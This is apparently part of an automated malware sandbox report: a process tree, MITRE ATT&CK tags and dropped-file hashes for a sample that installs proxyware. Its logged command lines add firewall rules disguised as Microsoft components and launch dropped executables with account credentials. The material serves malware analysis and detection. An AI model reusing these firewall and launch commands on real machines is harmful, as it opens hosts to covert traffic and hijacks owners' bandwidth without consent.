      netsh advfirewall firewall add rule name=Microsoft_Dcom dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 9132
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall set rule name=Microsoft_Dcom new enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 8932
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_Store dir=in program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 8796
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_Store dir=out program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 8536
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall set rule name=Microsoft_Store new enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 8360
    C:\Windows\Microsoft.NET\ctfmoon.exe
      C:\Windows\Microsoft.NET\ctfmoon.exe [email protected] -password=123456Aa. -device-name=Win32 -accept-tos
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID: 2532
    C:\Windows\Microsoft.NET\Meson.exe
      C:\Windows\Microsoft.NET\Meson.exe
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 2292
    C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
      C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
      PID: 9848
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Server Software Component (1)
  - Terminal Services DLL (1)
Privilege Escalation
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Downloads
-
Filesize: 8.9MB
MD5: 87c8b215c031443d630da6c18088f89a
SHA1: 7a17a9026ec093c4571c13c2fc128b27fbd66a11
SHA256: 0caedcf61c3bfe2da33b30adf2f5f2c1530b6907f133f4289519a56cc5c1bae6
SHA512: 48d5565f5da60371b79d2c380a63c7b416a220ae7f52656ba4ed9447cf55ab73a05c4165c61c2a95c4e586b2baf483b0b97dcff77c76cadfe039690ded35c43e
-
Filesize: 9.1MB
MD5: 1de26ef85f7218e1df4ed675fa2b05d4
SHA1: e5217fa3b50f625d84d5e5c4b66c031f7a2446ae
SHA256: fdd762192d351cea051c0170840f1d8d171f334f06313a17eba97cacb5f1e6e1
SHA512: ada80a9f97bec76899eccc40c646387a067a201663d4d0f4537af450ea7c92df877f017862634e32e9e2ba08ca6d41806dc03f0dfd7f811ca303b56b1ac17d92
-
Filesize: 44KB
MD5: c24315b0585b852110977dacafe6c8c1
SHA1: be855cd1bfc1e1446a3390c693f29e2a3007c04e
SHA256: 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
SHA512: 81032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2
-
Filesize: 7KB
MD5: 497080fed2000e8b49ee2e97e54036b1
SHA1: 4af3fae881a80355dd09df6e736203c30c4faac5
SHA256: 756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
SHA512: 4f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df
-
Filesize: 494KB
MD5: 5b6a804db0c5733d331eb126048ca73b
SHA1: f18c5acae63457ad26565d663467fa5a7fbfbee4
SHA256: 5bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9
SHA512: ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26
-
Filesize: 11.7MB
MD5: 1af2da7b95cdbbd5a18461e5d5fe910a
SHA1: 8540958b02170962cb958da094e059be5ff43fb0
SHA256: 1b08b6f863be2c62eb5b00457475630fddb245361f1a35e4396eada29e2da64a
SHA512: bc3ea6b76cc8079871c550af197d01c227526688881b10a5192a215d9dca8cd8401408d6a6835444cab862b20856b1ad88b1450a3f93dfa8cd2ecbdc5653459a
-
Filesize: 3.2MB
MD5: 3809c59565787ee7398fe9222d4bd669
SHA1: 68842768c9ae9deb1d1d7ed2b27846c392b47103
SHA256: c751d97251cd67604c0256b779fabac87d4ed2d647ce0d830e2a1670cd3616c6
SHA512: 2f78ad26acfe15f4682b69090704fa8ebb24938c8a58b8d343ef0993e8234897aed53dfcea4119168f915384fe545d2cbb16bc12339d0600dafae06deefc9098
-
Filesize: 29B
MD5: f6262ef1583c2ff55e4d5c88fdb93a9d
SHA1: b1b3f25f1296d2a27a9f13711e756ce1bd18524c
SHA256: e7df16b8cee14c69a079ecd3b7957ca3bf362fa7a0f89eee6c16ec6305ac9fbe
SHA512: dc8f97cf9d542623a6b651e493a065da2d24f93d285dc152b43719708c2231f83ded09d8064dae826200a6de13c650f70bbd94cc1c7943b9886bb0938b33b034
-
Filesize: 180KB
MD5: c66c3b3bffc02ef8eb1e0840275b2243
SHA1: 9e999ac7f977fd54cb104a4bbe800e7c56be9ca1
SHA256: 4842fe20bb1746ee61be52bf7ab03e2ac1c773069040f3f0d3700053c0463287
SHA512: 553f16bad1275868b47d23ff76b13b953a5bf68c3eebd6d23bb8b3c2acb2748db6bf55b1c10b58760098e177512dcaa04f878bbc6c26ead3af75ac8237c5b0de
-
Filesize: 4KB
MD5: a70f8622fed92bca258a2fb923d67451
SHA1: 756541646c6cae5a574886a4ac92ba7688e9a6a3
SHA256: bdcd08e9a540fcd7f81e9ff1c016de991df02173764b2453638247a1181608e3
SHA512: 951659c62a8e94cbb665975a05086384b3f67e7282dfa44cfdc7f75edbf0e5093a88ad6d633a7d33b9bd551621ddb9eca95b4607f77e3442bcfd3e542841299c
-
Filesize: 23.7MB
MD5: effda8dc24b5465dd1424177160a5f1a
SHA1: 9c3267d98ec841d4debda61d7c6aa158e6750996
SHA256: 2bfbf9d0ed537106096a2dbfdb4bc1bbc1818c8d5befbad46fe872dfb2e5ee0b
SHA512: 98e4155193e06baaec900d423eee3069809dbe5d26d401ce4508b79e4874b9014c3d6a8f36416074a369e17b089cd081820c01dc6cdd6743ece01e2ac182ac79
-
Filesize: 126KB
MD5: 8c80dd97c37525927c1e549cb59bcbf3
SHA1: 4e80fa7d98c8e87facecdef0fc7de0d957d809e1
SHA256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
SHA512: 50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e
-
Filesize: 1.4MB
MD5: 4935b75f2a23d38527cf3821c9d9dac3
SHA1: f17aa56215ab7b90da00f048fe30d39a2d671b5d
SHA256: dd2d7b07e9091590ae60b42022956319bbbbd51b457ea214fb475ecc3e9156f8
SHA512: 348e041104de20b0850b19db1ebb88ae0b65ecd1695f1ade47e099d62da9cec983a1a73e7fc657509b4fc58496784e0c1681bf46265477b75fdfab440c41acbd
-
Filesize: 98KB
MD5: a539d27f33ef16e52430d3d2e92e9d5c
SHA1: f6d4f160705dc5a8a028baca75b2601574925ac5
SHA256: db0831e19a4e3a736ea7498dadc2d6702342f75fd8f7fbae1894ee2e9738c2b4
SHA512: 971c7d95f49f9e1ae636d96f53052cfc3dbdb734b4a3d386346bf03ca78d793eaee18efcae2574b88fdee5633270a24db6c61aa0e170bcc6d11750dbd79ad0af
-
Filesize: 15KB
MD5: 3c2fe2dbdf09cfa869344fdb53307cb2
SHA1: b67a8475e6076a24066b7cb6b36d307244bb741f
SHA256: 0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
SHA512: d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c
-
Filesize: 10KB
MD5: ba629216db6cf7c0c720054b0c9a13f3
SHA1: 37bb800b2bb812d4430e2510f14b5b717099abaa
SHA256: 15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
SHA512: c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9
-
Filesize: 807KB
MD5: 9a5cec05e9c158cbc51cdc972693363d
SHA1: ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
SHA256: aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
SHA512: 8af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94
-
Filesize: 11KB
MD5: 2f0a52ce4f445c6e656ecebbcaceade5
SHA1: 35493e06b0b2cdab2211c0fc02286f45d5e2606d
SHA256: cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
SHA512: 88151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1
-
Filesize: 232KB
MD5: f0881d5a7f75389deba3eff3f4df09ac
SHA1: 8404f2776fa8f7f8eaffb7a1859c19b0817b147a
SHA256: ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
SHA512: f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e
-
Filesize: 58KB
MD5: 838ceb02081ac27de43da56bec20fc76
SHA1: 972ab587cdb63c8263eb977f10977fd7d27ecf7b
SHA256: 0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
SHA512: bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22
-
Filesize: 29KB
MD5: 3e89c56056e5525bf4d9e52b28fbbca7
SHA1: 08f93ab25190a44c4e29bee5e8aacecc90dab80c
SHA256: b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
SHA512: 32487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6
-
Filesize: 9KB
MD5: 83076104ae977d850d1e015704e5730a
SHA1: 776e7079734bc4817e3af0049f42524404a55310
SHA256: cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
SHA512: bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8
-
Filesize: 57KB
MD5: 6b7276e4aa7a1e50735d2f6923b40de4
SHA1: db8603ac6cac7eb3690f67af7b8d081aa9ce3075
SHA256: f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
SHA512: 58e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa
-
Filesize: 31KB
MD5: 5b72ccfa122e403919a613785779af49
SHA1: f560ea0a109772be2b62c539b0bb67c46279abd1
SHA256: b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68
SHA512: 6d5e0fef137c9255244641df39d78d1180172c004882d23cf59e8f846726021ba18af12deb0e60dfe385f34d7fb42ae2b5e54915ffa11c42d214b4fbfad9f39d